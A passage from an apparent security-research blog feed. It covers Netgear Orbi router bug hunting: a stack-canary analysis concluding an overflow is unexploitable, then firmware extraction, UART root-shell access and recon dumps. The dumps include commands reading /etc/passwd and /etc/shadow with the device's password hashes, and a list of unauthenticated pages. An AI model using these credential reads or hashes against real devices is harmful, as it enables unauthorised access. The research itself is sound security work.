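    raw = bytearray(struct.pack("<I", canary))  # little-endian, as laid out in memory
    spill = (written + b"\x00")[:4]
    raw[:len(spill)] = spill
    return struct.unpack("<I", bytes(raw))[0]


# Overflow by exactly the terminator: only the lowest byte is zeroed.
print(hex(after_overflow(ORIGINAL, b"")))       # 0xb710d200, the r2 value above

# Even a correct guess for the first byte fails, because the NUL lands on the second.
print(hex(after_overflow(ORIGINAL, b"\x9e")))   # 0xb710009e
```

<p>In other words, with a terminator appended, a guess for byte <em>n</em> can only ever succeed if byte <em>n+1</em> of the canary happens to be zero, so the crash oracle never confirms a correct byte.</p>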

<p>Not only that, the canary value was changing in between each request. In retrospect, this is obvious since <code class="language-plaintext highlighter-rouge">soap-api</code> is not forking itself to handle the requests, but instead being <code class="language-plaintext highlighter-rouge">execve</code>‘ed at some point after <code class="language-plaintext highlighter-rouge">lighttpd</code> forks.</p>

<p>So, yeah, (smarter) bruteforcing was out of the question. Since along the way I’d also learned that PIE and RELRO were enabled on the binary, I called it quits at this point, and I feel pretty confident in saying this isn’t an exploitable issue.</p>

<h2 id="conclusion">conclusion</h2>

<p>This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.</p>

<p>Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.</p>

<h2 id="references">references</h2>

<ul>
  <li><a href="https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/">Stack Canaries – Gingerly Sidestepping the Cage</a> [2021]</li>
  <li><a href="https://www.youtube.com/watch?v=01EX0mjya5A">LiveOverflow video</a></li>
  <li><a href="https://ctf101.org/binary-exploitation/stack-canaries/">CTF guide</a> on stack canaries</li>
  <li><a href="https://bananamafia.dev/post/binary-canary-bruteforce/">Bruteforcing x86 Stack Canaries</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="research" /><category term="bug-hunting" /><category term="triage" /><category term="orbi" /><category term="netgear" /><category term="iot" /><summary type="html"><![CDATA[a walkthrough of my experience finding a buffer overflow, discovering a null pointer deref along the way, and eventually figuring out the bug wasn't (easily) exploitable.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">orbi hunting 0x0: introduction, UART access, recon</title><link href="https://blog.coffinsec.com/research/2022/06/12/orbi-hunting-0-intro-uart.html" rel="alternate" type="text/html" title="orbi hunting 0x0: introduction, UART access, recon" /><published>2022-06-12T00:00:00+00:00</published><updated>2022-06-12T00:00:00+00:00</updated><id>https://blog.coffinsec.com/research/2022/06/12/orbi-hunting-0-intro-uart</id><content type="html" xml:base="https://blog.coffinsec.com/research/2022/06/12/orbi-hunting-0-intro-uart.html"><![CDATA[<p>I’ve been hunting for bugs on the Netgear Orbi (RBR20) for about a year and a half now. This is the first in a series of posts where I’ll be publishing my notes and findings from this research. This post provides a high-level overview of the system and notes on getting serial console access via UART.</p>

<h2 id="introduction">Introduction</h2>
<p>I wanted to upgrade the WiFi at home a few years ago and ended up purchasing one of Netgear’s Orbi line of mesh WiFi routers. After about a year I ended up doing a ‘<em>real</em>’ upgrade to some Ubiquiti equipment, so I had this Orbi just lying around and decided to use it as a target for bug hunting. I’ve done a bit of research against IoT devices in the past and wanted something new to look into. I’ve now been hunting on this device for about a year and a half, walking away and coming back to it multiple times, and sometimes going months without doing anything with it. Over this time I’ve explored a few angles and documented quite a bit of it, so I thought I’d just start dumping some of this information here, mostly in the hopes that it may be useful to anyone else in the future who may be interested in doing their own hunting on this device.</p>

<!-- ![shell](/assets/images/orbi-connect.png){:style="display:block; margin-left:auto; margin-right:auto"} -->

<p><strong>Minor disclaimer:</strong> This series of posts may be a bit disjointed and may not always provide much of a narrative. As mentioned above, it’s meant to be a data dump and not so much a walkthrough of every step I took along the way. Where possible I’ll provide context around how I came to certain conclusions, why I decided to look in a particular area, and any other information that I think may be useful to others.</p>

<h2 id="overview">Overview</h2>

<h3 id="system-details">System Details</h3>

<ul>
  <li><strong>Device:</strong> Netgear Orbi (RBR20)</li>
  <li><strong>Firmware Version(s):</strong>
    <ul>
      <li><code class="language-plaintext highlighter-rouge">2.5.1.16</code> (<a href="https://www.downloads.netgear.com/files/GDC/RBR20/RBR20-V2.5.1.16.zip">Download</a>)</li>
      <li><code class="language-plaintext highlighter-rouge">2.7.33</code> (<a href="https://www.downloads.netgear.com/files/GDC/RBR20/RBR20-V2.7.3.22.zip">Download</a>)</li>
    </ul>
  </li>
  <li><strong>Architecture:</strong> ARMv7 rev 5</li>
  <li><strong>Kernel:</strong> <code class="language-plaintext highlighter-rouge">Linux RBR20 3.14.77 #2 SMP PREEMPT</code></li>
  <li><strong>OS:</strong> Customized OpenWRT Chaos Calmer image</li>
</ul>

<h3 id="hardware-details">Hardware Details</h3>
<h4 id="basic-specs">Basic Specs</h4>
<ul>
  <li>Processor: Quad-Core ARM Cortex-A7, Qualcomm</li>
  <li>Memory: 1GB RAM</li>
  <li>Storage: 512MB NAND flash</li>
  <li>Radio: 2.4Ghz + 5Ghz wireless</li>
</ul>

<h4 id="board-layout-and-components">Board Layout and Components</h4>

<p>I took a look at the <a href="https://fccid.io/PY317400402">FCC listing</a> for this particular device and reviewed the internal photographs, but soon discovered that the images on this site didn’t exactly match my device: certain components were either different brands/devices or missing entirely from the images compared to my actual device. In any case, this still provided a good point of reference for getting a general understanding of where things were supposed to be.</p>

<p>The top of the PCB exposes the following components:</p>
<ul>
  <li>BLE + Wifi SoC</li>
  <li>CPU (beneath a shield)</li>
  <li>Voltage regulator</li>
  <li>RJ45 ports</li>
  <li>Power input</li>
  <li>UART pins</li>
</ul>

<p>The bottom side of the PCB:</p>

<ul>
  <li>Winbond NAND flash</li>
  <li>NANYA DRAM</li>
</ul>

<p><img src="/assets/images/orbi-hw1.png" alt="top" /> <img src="/assets/images/orbi-hw2.png" alt="bottom" /></p>

<h3 id="firmware-extraction">Firmware Extraction</h3>

<p>I used <code class="language-plaintext highlighter-rouge">binwalk</code> to extract the root filesystem from the firmware images provided by Netgear. This successfully extracted the embedded squashfs filesystem.</p>
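
<p>If you want to sanity-check where the filesystem sits inside an image before (or instead of) running an extraction tool, a signature scan is easy to sketch. The snippet below only looks for the little-endian SquashFS superblock magic <code class="language-plaintext highlighter-rouge">hsqs</code>; the function name and the synthetic test image are mine, and a real image may contain false positives or additional wrappers that this does not handle.</p>

```python
SQUASHFS_MAGIC = b"hsqs"  # little-endian SquashFS superblock magic


def find_squashfs_offsets(blob: bytes) -> list:
    """Return every offset at which the SquashFS magic appears in the blob."""
    offsets = []
    pos = blob.find(SQUASHFS_MAGIC)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(SQUASHFS_MAGIC, pos + 1)
    return offsets


# Synthetic stand-in for a firmware image: header padding, then a fake filesystem.
image = b"\x00" * 128 + SQUASHFS_MAGIC + b"\xff" * 32
print(find_squashfs_offsets(image))  # [128]
```

<p>Against a real image you would read the file in binary mode and pass its contents in; any offset reported is just a candidate start for carving the filesystem out.</p>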

<p>Below is a listing of the root directory from the extracted filesystem:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 __rd_debug_only
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 bin
<span class="nt">-rw-r--r--</span>  1 builder builder     9 Feb 13 00:47 cloud_version
drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 data
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 dev
drwxr-xr-x 33 builder builder  4096 Feb 13 02:20 etc
<span class="nt">-rw-r--r--</span>  1 builder builder    11 Feb 13 00:47 firmware_language_version
<span class="nt">-rw-r--r--</span>  1 builder builder     1 Feb 13 00:47 firmware_region
<span class="nt">-rw-r--r--</span>  1 builder builder    29 Feb 13 00:47 firmware_time
<span class="nt">-rw-r--r--</span>  1 builder builder    10 Feb 13 00:47 firmware_version
<span class="nt">-rw-r--r--</span>  1 builder builder    11 Feb 13 00:47 flash_type
<span class="nt">-rw-r--r--</span>  1 builder builder    11 Feb 13 00:47 hardware_version
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 home -&gt; /tmp
<span class="nt">-rw-r--r--</span>  1 builder builder    31 Feb 13 00:47 hw_id
drwxr-xr-x 18 builder builder  4096 Feb 13 02:20 lib
lrwxrwxrwx  1 builder builder     8 Feb 13 00:47 mnt -&gt; /tmp/mnt
<span class="nt">-rw-r--r--</span>  1 builder builder     6 Feb 13 00:47 module_name
drwxr-xr-x  5 builder builder  4096 Feb 13 02:20 opt
lrwxrwxrwx  1 builder builder    12 Feb 13 00:47 overlay -&gt; /tmp/overlay
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 proc
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 rom
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 root
drwxr-xr-x  3 builder builder 12288 Feb 13 02:20 sbin
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 sys
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 tmp
drwxr-xr-x  9 builder builder  4096 Feb 13 02:20 usr
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 var -&gt; /tmp
drwxr-xr-x 14 builder builder 57344 Feb 13 02:20 www
</code></pre></div></div>

<h3 id="gpl-code">GPL Code</h3>

<p>Apart from the files from the extracted firmware images, I also downloaded the GPL code for each of the firmware versions I looked at. Download links for these packages can be found on <a href="https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL">this page</a> for Netgear, though most vendors provide these packages as required by the license. They include the source code for all GPL code the vendor used and/or modified to create the system.</p>

<ul>
  <li><a href="https://www.downloads.netgear.com/files/GPL/Orbi-Micro-V2.5.1.16_gpl_src.tar.bz2.zip">GPL Code for v2.5.1.16</a></li>
  <li><a href="https://www.downloads.netgear.com/files/GPL/orbi-micro-V2.7.3.22_gpl_src.tar.bz2.zip">GPL Code for v2.7.33</a></li>
</ul>

<p>The majority of the custom code/interesting files are located under the <code class="language-plaintext highlighter-rouge">git_home</code> directory of the extracted archive (which is an OpenWrt buildroot directory).</p>

<p>Note: While having vendors provide their modified code sounds great in theory, the reality is a little different. For example, the GPL packages for the Orbi include a lot of source code, but specific open source applications they made modified copies of are given in binary form only.</p>

<p><br /></p>

<h2 id="firmware-25116-vs-2733-changes">Firmware 2.5.1.16 vs. 2.7.33 Changes</h2>

<p>There are a couple of important things that changed between these two firmware versions that I want to mention here.</p>

<h3 id="easy-telnet-access-removed">(Easy) Telnet Access Removed</h3>

<p>First, in the older version it was possible to enable Telnet access via the hidden debug page at <code class="language-plaintext highlighter-rouge">http://&lt;orbi&gt;/debug_detail.htm</code> when logged in as the admin user. This was removed in the later version and it is no longer trivial to enable Telnet. There does appear to still be Netgear’s custom Telnet server <code class="language-plaintext highlighter-rouge">telnetenable</code> that listens on UDP port 23 and will only “activate” upon receiving a ‘magic’ packet containing username/pass and other info in a specific format (see <a href="https://github.com/insanid/netgear-telenetenable">here</a>).</p>

<p>The code for this binary is included in the GPL packages. Version 2.5.x seems to have only allowed the use of this feature if the Region was set to Chinese and the Region file contained “WW”. The 2.7.x version doesn’t include this check and simply compares the received data against a local version it constructs (the main server loop is shown below):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>
		<span class="n">FD_ZERO</span><span class="p">(</span><span class="o">&amp;</span><span class="n">readable</span><span class="p">);</span>
		<span class="n">FD_SET</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">readable</span><span class="p">);</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">select</span><span class="p">(</span><span class="n">fd</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">readable</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
			<span class="k">continue</span><span class="p">;</span>

		<span class="n">slen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr_in</span><span class="p">);</span>
		<span class="n">r</span> <span class="o">=</span> <span class="n">recvfrom</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">rbuf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">rbuf</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">from</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">slen</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">r</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
			<span class="k">continue</span><span class="p">;</span>

		<span class="n">datasize</span> <span class="o">=</span> <span class="n">fill_payload</span><span class="p">(</span><span class="n">output_buf</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">r</span> <span class="o">==</span> <span class="n">datasize</span> <span class="o">&amp;&amp;</span> <span class="n">memcmp</span><span class="p">(</span><span class="n">rbuf</span><span class="p">,</span> <span class="n">output_buf</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
			<span class="cm">/* maybe it's better to judge whether utelnetd is running in real time here */</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">telnet_enabled</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">printf</span><span class="p">(</span><span class="s">"The telnet server is enabled now!!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
				<span class="n">system</span><span class="p">(</span><span class="n">TELNET_CMD</span><span class="p">);</span>
				<span class="n">telnet_enabled</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="n">sendto</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">ack</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">from</span><span class="p">,</span> <span class="n">slen</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
</code></pre></div></div>

<p>Even so, I’ve yet to successfully enable Telnet even when using known-good credentials with either the telnet version linked above or my own customized version of the code included in the GPL packages.</p>

<h3 id="binaries-in-gpl-packages-stripped">Binaries in GPL Packages Stripped</h3>

<p>The earlier version of the GPL code package provided binaries that had not been stripped of debug symbols, making reverse engineering of these specific applications much easier. They’re still useful for reversing the newer binaries, though, as most functions are still intact and knowing exactly what everything should be called always helps.</p>

<p>The paths to some of these binaries are provided here (these are paths on the root filesystem of the device):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/sbin/net-cgi
/usr/sbin/soap-api
/usr/sbin/miniupnpd
</code></pre></div></div>

<p><br /></p>

<h2 id="uart-serial-console-access">UART Serial Console Access</h2>

<p>After losing Telnet access when my device was unintentionally upgraded, I moved on to seeing if I could get access to a console over serial. My device still had pins connected as shown below, so this immediately caught my attention as a potential serial interface. I found info online for other Orbi models that showed the correct pin layout.</p>

<p>Starting with the pin closest to the RJ45 port:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">GND, RX, TX, power (not needed)</code></li>
</ul>

<p><img src="/assets/images/orbi-hw3.png" alt="pins" /></p>

<p>I connected to these pins on the board using an FTDI serial-USB converter in the 3.3V configuration at 115200 baud (8N1) and successfully dropped into a root shell.</p>

<h3 id="bonus-greatfet-one-uart-setup">Bonus: GreatFET ONE UART Setup</h3>

<p>After confirming this worked with the FTDI converter, I decided to use my GreatFET ONE board moving forward. This is an interesting hardware hacking tool I bought some time ago to begin experimenting with USB fuzzing/analysis. It allows for USB proxying and emulation of various USB devices (keyboard, storage, etc) through a programmatic interface using Python.</p>

<p>I remembered that it can also be used for serial/UART connections but had a difficult time finding any good documentation or examples of doing this. Eventually, I was able to get this working by connecting pins to the following ports on the GreatFET’s J1 bank of I/O pins (see full pin table <a href="https://github.com/greatfet-hardware/azalea">here</a>):</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">1:GND</code></li>
  <li><code class="language-plaintext highlighter-rouge">33:RX</code></li>
  <li><code class="language-plaintext highlighter-rouge">34:TX</code></li>
</ul>

<p>I then used the built-in UART script provided by the <code class="language-plaintext highlighter-rouge">greatfet</code> library/CLI tool:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>greatfet uart <span class="nt">--wait</span> <span class="nt">-P</span> none <span class="nt">-N</span>
</code></pre></div></div>

<p><br /></p>

<h2 id="recon-dump">Recon Dump</h2>

<h3 id="boot-log-highlights">boot log highlights</h3>

<p><strong>CPU Info:</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Booting Linux on physical CPU 0x0
Linux version 3.14.77 (lijun.xue@cnshadnicp03.deltaos.corp) (gcc version 5.2.0 (OpenWrt GCC 5.2.0 r6043) ) #1 SMP PREEMPT Fri Jun 4 19:11:51 CST 2021
CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine model: Qualcomm Technologies, Inc. IPQ40xx/AP-DK04.1-C1
PERCPU: Embedded 8 pages/cpu @dfbc7000 s8448 r8192 d16128 u32768
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 125952
</code></pre></div></div>

<p><strong>Kernel memory layout:</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
    vmalloc : 0xe0800000 - 0xff000000   ( 488 MB)
    lowmem  : 0xc0000000 - 0xe0000000   ( 512 MB)
    pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
    modules : 0xbf000000 - 0xbfe00000   (  14 MB)
      .text : 0xc0208000 - 0xc073e1fc   (5337 kB)
      .init : 0xc073f000 - 0xc076a100   ( 173 kB)
      .data : 0xc076c000 - 0xc07abb38   ( 255 kB)
       .bss : 0xc07abb38 - 0xc0804680   ( 355 kB)
SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
Preemptible hierarchical RCU implementation.
</code></pre></div></div>
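
<p>When reading crash dumps or register values later on, it helps to be able to tell at a glance which region an address falls in. Here is a small lookup sketch built from the table above; the helper name is mine, and treating everything below the modules region as userspace is an assumption based on the usual 32-bit ARM split rather than something the boot log states.</p>

```python
# Region boundaries copied from the boot log above (start inclusive, end exclusive).
REGIONS = [
    ("modules", 0xBF000000, 0xBFE00000),
    ("pkmap",   0xBFE00000, 0xC0000000),
    ("lowmem",  0xC0000000, 0xE0000000),
    ("vmalloc", 0xE0800000, 0xFF000000),
    ("fixmap",  0xFFF00000, 0xFFFE0000),
    ("vector",  0xFFFF0000, 0xFFFF1000),
]


def classify(addr: int) -> str:
    """Name the kernel virtual memory region containing addr."""
    for name, start, end in REGIONS:
        if start <= addr < end:
            return name
    # Assumption: anything below the modules area belongs to userspace.
    return "userspace" if addr < 0xBF000000 else "unmapped/other"


print(classify(0xC0208000))  # lowmem (start of kernel .text)
print(classify(0xBF000000))  # modules
print(classify(0x00010000))  # userspace
```

<p>The <code class="language-plaintext highlighter-rouge">.text</code>, <code class="language-plaintext highlighter-rouge">.init</code>, <code class="language-plaintext highlighter-rouge">.data</code> and <code class="language-plaintext highlighter-rouge">.bss</code> ranges are left out of the table on purpose since they all sit inside lowmem.</p>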

<h3 id="system-users">System Users</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@RBR206:/# cat /etc/passwd
root:$5$BChRWDkyPlaOVrGS$/kQaqSCIWiiM36IuwS5phJHhpzdnP9osEVONs4CZa3C:0:0:root:/tmp:/bin/ash
guest:*:65534:65534:guest:/tmp/ftpadmin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
admin:x:1:1:Linux User,,,:/tmp/ftpadmin:/bin/ash

root@RBR206:/# cat /etc/shadow 
guest::10957:0:99999:7:::
admin:$1$QPu5pxAi$ITZQ21EZg7P2B48TsiQwg1:18612:0:99999:7:::
</code></pre></div></div>
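
<p>The <code class="language-plaintext highlighter-rouge">$id$salt$hash</code> prefixes in these entries identify the hashing scheme, which is worth knowing before throwing them at a cracker. The sketch below maps the common crypt identifiers to names; the function name is mine and the table only covers the three schemes listed.</p>

```python
CRYPT_SCHEMES = {
    "1": "MD5-crypt",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
}


def identify(entry: str) -> tuple:
    """Return (user, scheme) for one passwd/shadow line."""
    user, field = entry.split(":")[:2]
    if field in ("", "*", "x", "!"):
        return user, "no hash in this field"
    parts = field.split("$")
    if len(parts) >= 4 and parts[0] == "":
        return user, CRYPT_SCHEMES.get(parts[1], "unknown scheme id " + parts[1])
    return user, "legacy or unknown format"


for line in [
    "root:$5$BChRWDkyPlaOVrGS$/kQaqSCIWiiM36IuwS5phJHhpzdnP9osEVONs4CZa3C:0:0:root:/tmp:/bin/ash",
    "admin:$1$QPu5pxAi$ITZQ21EZg7P2B48TsiQwg1:18612:0:99999:7:::",
    "guest::10957:0:99999:7:::",
]:
    print(identify(line))
```

<p>Run against the dump above, this reports SHA-256-crypt for <code class="language-plaintext highlighter-rouge">root</code> (whose hash sits directly in <code class="language-plaintext highlighter-rouge">/etc/passwd</code>), MD5-crypt for <code class="language-plaintext highlighter-rouge">admin</code>, and an empty password field for <code class="language-plaintext highlighter-rouge">guest</code>.</p>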

<h3 id="listening-processes-netstat--lp">Listening Processes (<code class="language-plaintext highlighter-rouge">netstat -lp</code>)</h3>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@RBR20:/# netstat <span class="nt">-lp</span>
Active Internet connections <span class="o">(</span>only servers<span class="o">)</span>
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.13.13.1:7272         0.0.0.0:<span class="k">*</span>               LISTEN      15890/circled
tcp        0      0 0.0.0.0:www             0.0.0.0:<span class="k">*</span>               LISTEN      8278/lighttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:<span class="k">*</span>               LISTEN      16137/dnsmasq
tcp        0      0 0.0.0.0:https           0.0.0.0:<span class="k">*</span>               LISTEN      8278/lighttpd
tcp        0      0 :::www                  :::<span class="k">*</span>                    LISTEN      8278/lighttpd
tcp        0      0 :::56688                :::<span class="k">*</span>                    LISTEN      7298/miniupnpd
tcp        0      0 :::domain               :::<span class="k">*</span>                    LISTEN      16137/dnsmasq
tcp        0      0 :::https                :::<span class="k">*</span>                    LISTEN      8278/lighttpd
udp        0      0 10.13.13.1:38407        0.0.0.0:<span class="k">*</span>                           7298/miniupnpd
udp        0      0 10.13.13.1:23           0.0.0.0:<span class="k">*</span>                           12782/telnetenable
udp        0      0 0.0.0.0:domain          0.0.0.0:<span class="k">*</span>                           16137/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:<span class="k">*</span>                           2646/udhcpd
udp        0      0 0.0.0.0:tftp            0.0.0.0:<span class="k">*</span>                           8334/tftpd-hpa
udp        0      0 0.0.0.0:1900            0.0.0.0:<span class="k">*</span>                           7298/miniupnpd
udp        0      0 0.0.0.0:45226           0.0.0.0:<span class="k">*</span>                           5777/net-scan
udp        0      0 10.13.13.1:5351         0.0.0.0:<span class="k">*</span>                           7298/miniupnpd
udp        0      0 :::domain               :::<span class="k">*</span>                                16137/dnsmasq
</code></pre></div></div>

<h3 id="mount-points">Mount Points</h3>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@RBR20:~# mount
rootfs on / <span class="nb">type </span>rootfs <span class="o">(</span>rw<span class="o">)</span>
/dev/root on /rom <span class="nb">type </span>squashfs <span class="o">(</span>ro,relatime<span class="o">)</span>
proc on /proc <span class="nb">type </span>proc <span class="o">(</span>rw,nosuid,nodev,noexec,noatime<span class="o">)</span>
sysfs on /sys <span class="nb">type </span>sysfs <span class="o">(</span>rw,nosuid,nodev,noexec,noatime<span class="o">)</span>
tmpfs on /tmp <span class="nb">type </span>tmpfs <span class="o">(</span>rw,nosuid,nodev,noatime<span class="o">)</span>
overlayfs:/tmp/overlay on / <span class="nb">type </span>overlayfs <span class="o">(</span>rw,relatime,lowerdir<span class="o">=</span>/,upperdir<span class="o">=</span>/tmp/overlay<span class="o">)</span>
tmpfs on /dev <span class="nb">type </span>tmpfs <span class="o">(</span>rw,nosuid,relatime,size<span class="o">=</span>512k,mode<span class="o">=</span>755<span class="o">)</span>
devpts on /dev/pts <span class="nb">type </span>devpts <span class="o">(</span>rw,nosuid,noexec,relatime,mode<span class="o">=</span>600<span class="o">)</span>
debugfs on /sys/kernel/debug <span class="nb">type </span>debugfs <span class="o">(</span>rw,noatime<span class="o">)</span>
ubi0:vol_ntgr on /tmp/mnt/ntgr <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
ubi0:vol_arlo on /tmp/dal <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
ubi0:vol_devtable on /tmp/device_tables <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
ubi0:vol_circle on /tmp/mnt/circle <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
</code></pre></div></div>

<h3 id="web-servers">Web Servers</h3>

<p><strong>Web servers will be discussed in further detail in a future post but for now I’ll just cover some of the basics.</strong></p>

<p>The following binaries provide an HTTP server or are otherwise involved in handling HTTP-formatted requests.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/sbin/lighttpd
/usr/sbin/net-cgi
/usr/sbin/soap-api
/www/cgi-bin/proccgi
</code></pre></div></div>

<ul>
  <li><strong>lighttpd</strong> is the main user-facing web server process that handles requests; it mostly wraps around net-cgi.</li>
  <li><strong>net-cgi</strong> handles the bulk of the admin functionality: it reads the underlying system configs and makes config changes.
    <ul>
      <li>net-cgi responses are typically embedded in the responses returned by lighttpd, either within iframes or as raw data written back to the FD.</li>
    </ul>
  </li>
  <li><strong>soap-api</strong> is the binary called by the CGI handler to handle SOAP requests. All requests to <code class="language-plaintext highlighter-rouge">/soapapi.cgi</code> or <code class="language-plaintext highlighter-rouge">/soap/server_sa</code> are routed to this binary. It is a CGI application that reads most of the request data from environment variables (it expects the parent process to set all of this up prior to spawning soap-api).</li>
</ul>
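
<p>To make the soap-api description a bit more concrete, here is a minimal Python sketch of how a CGI-style handler usually receives a request: metadata from environment variables set by the parent, body from stdin. This is not soap-api's actual code. It assumes the standard CGI variable names from RFC 3875 (<code class="language-plaintext highlighter-rouge">REQUEST_METHOD</code>, <code class="language-plaintext highlighter-rouge">CONTENT_LENGTH</code>, <code class="language-plaintext highlighter-rouge">HTTP_SOAPACTION</code>, and so on), and the function name <code class="language-plaintext highlighter-rouge">read_cgi_request</code> is made up for illustration; which variables soap-api really consumes would need to be confirmed by reversing the binary.</p>

```python
import io
import os
import sys


def read_cgi_request(environ=None, stdin=None):
    """Collect a request the way a generic RFC 3875 CGI handler would.

    Hypothetical helper: the variable names are the standard CGI ones,
    assumed here, not confirmed against the soap-api binary.
    """
    environ = os.environ if environ is None else environ
    stdin = sys.stdin.buffer if stdin is None else stdin

    # Request metadata is passed in as environment variables by the parent.
    request = {
        "method": environ.get("REQUEST_METHOD", "GET"),
        "path": environ.get("SCRIPT_NAME", ""),
        "query": environ.get("QUERY_STRING", ""),
        "content_type": environ.get("CONTENT_TYPE", ""),
        # HTTP headers show up as HTTP_* variables, so the SOAPAction
        # header becomes HTTP_SOAPACTION under standard CGI rules.
        "soap_action": environ.get("HTTP_SOAPACTION", "").strip('"'),
    }

    # Only the body arrives on stdin; CONTENT_LENGTH bounds the read.
    try:
        length = int(environ.get("CONTENT_LENGTH", "") or 0)
    except ValueError:
        length = 0
    request["body"] = stdin.read(length) if length > 0 else b""
    return request


if __name__ == "__main__":
    # Simulate what the parent would set up before spawning the handler.
    fake_env = {
        "REQUEST_METHOD": "POST",
        "SCRIPT_NAME": "/soap/server_sa",
        "CONTENT_TYPE": "text/xml",
        "CONTENT_LENGTH": "12",
        "HTTP_SOAPACTION": '"urn:example#Action"',  # placeholder value
    }
    print(read_cgi_request(fake_env, io.BytesIO(b"example-body")))
```

<p>The practical upshot of this design is that a binary like this can be exercised directly from a shell on the device by exporting the expected variables and piping a body in, without going through the web server at all.</p>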

<p>Only the following pages are accessible prior to authentication:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/unauth.cgi
/passwd_reset.cgi
/basic_home_result.txt
/debuginfo.htm
</code></pre></div></div>

<p><br /></p>

<h2 id="wrapping-up">Wrapping Up</h2>
<p>Okay, that was a ton of info.</p>

<p>As mentioned above, future posts will dive deeper into specific areas of interest and include some of my findings in these areas.</p>

<h3 id="references">References</h3>

<ul>
